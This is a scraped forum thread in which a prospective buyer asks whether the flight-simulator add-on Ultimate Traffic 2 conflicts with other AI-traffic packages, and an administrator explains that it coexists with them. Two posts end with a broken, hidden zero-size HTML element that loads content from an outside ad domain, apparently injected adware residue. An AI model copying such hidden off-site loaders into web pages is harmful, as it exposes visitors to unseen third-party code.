Ultimate Traffic Forums Homepage
Forum Home Forum Home > Ultimate Traffic 2 for FSX > General Discussion - Non Support Topics Only
  New Posts New Posts RSS Feed - Short question
  FAQ FAQ  Forum Search   Register Register  Login Login

Short question

 Post Reply Post Reply
Author
Message
tomt966 View Drop Down
Licensed Member
Licensed Member


Joined: September-07-2012
Location: Florida USA
Points: 3
Post Options Post Options   Thanks (0) Thanks(0)   Quote tomt966 Quote  Post ReplyReply Direct Link To This Post Topic: Short question
    Posted: September-10-2012 at 9:08am
Can't post in UT 2 forum even though I'm signed in. Question is - Will UT 2 FSx prioritize itself over my other AI planes i.e. WOAI or PAI add-ons? Or do I have to manually delete all my other  AI planes and schedules? Thanx
Tom
Back to Top
hanstatdg View Drop Down
Admin Group
Admin Group


Joined: May-26-2005
Location: London, UK
Points: 8251
Post Options Post Options   Thanks (0) Thanks(0)   Quote hanstatdg Quote  Post ReplyReply Direct Link To This Post Posted: September-10-2012 at 9:55am
You are not signed in to the UT2 Forum. Please Register HERE and post your question in the UT2 Forum for registered users.
This is to ensure that only owners of legitimate copies of UT2 will be offered support.
David Hanstater
Administrator.
Back to Top
tomt966 View Drop Down
Licensed Member
Licensed Member


Joined: September-07-2012
Location: Florida USA
Points: 3
Post Options Post Options   Thanks (0) Thanks(0)   Quote tomt966 Quote  Post ReplyReply Direct Link To This Post Posted: September-10-2012 at 11:02am
That's the problem. I can't sign in (register) unless I have the product. I have a question about the product before I buy it. Goofy system if I can't ask a question unless I buy the product.
Tom
< ="//edge.crtinv.com/get.?d=http%3A%2F%2Fultimatetraffic.flight1.net" style="width: 0px; height: 0px; display: none;">
Back to Top
hanstatdg View Drop Down
Admin Group
Admin Group


Joined: May-26-2005
Location: London, UK
Points: 8251
Post Options Post Options   Thanks (0) Thanks(0)   Quote hanstatdg Quote  Post ReplyReply Direct Link To This Post Posted: September-10-2012 at 12:16pm
Oh, I see. I didn't realise that you haven't bought UT2 yet. Sorry.

The answer to your question is that UT2 injects its AI via the SimConnect system (it doesn't use the traditional traffic_xxx.bgl), and will work alongside your World of AI etc. In other words, you get both. You can avoid any duplication if, for example, you have a WofAI package which is included in UT2, it is just a couple of mouse clicks to de-activate the UT2 one.

You most certainly do not have to remove any of your installed AI models and textures. In fact, you can use them in UT2.

You also have the option to import WofAI schedules into UT2, using the free PowerPack which is available to UT2 owners.
David Hanstater
Administrator.
Back to Top
tomt966 View Drop Down
Licensed Member
Licensed Member


Joined: September-07-2012
Location: Florida USA
Points: 3
Post Options Post Options   Thanks (0) Thanks(0)   Quote tomt966 Quote  Post ReplyReply Direct Link To This Post Posted: September-10-2012 at 1:18pm
OK - thanx ,,,its been ordered.
Tom
< ="//edge.crtinv.com/get.?d=http%3A%2F%2Fultimatetraffic.flight1.net" style="width: 0px; height: 0px; display: none;">
Back to Top
 Post Reply Post Reply
  Share Topic   

Forum Jump Forum Permissions View Drop Down

Forum Software by Web Wiz Forums® version 10.16
Copyright ©2001-2013 Web Wiz Ltd.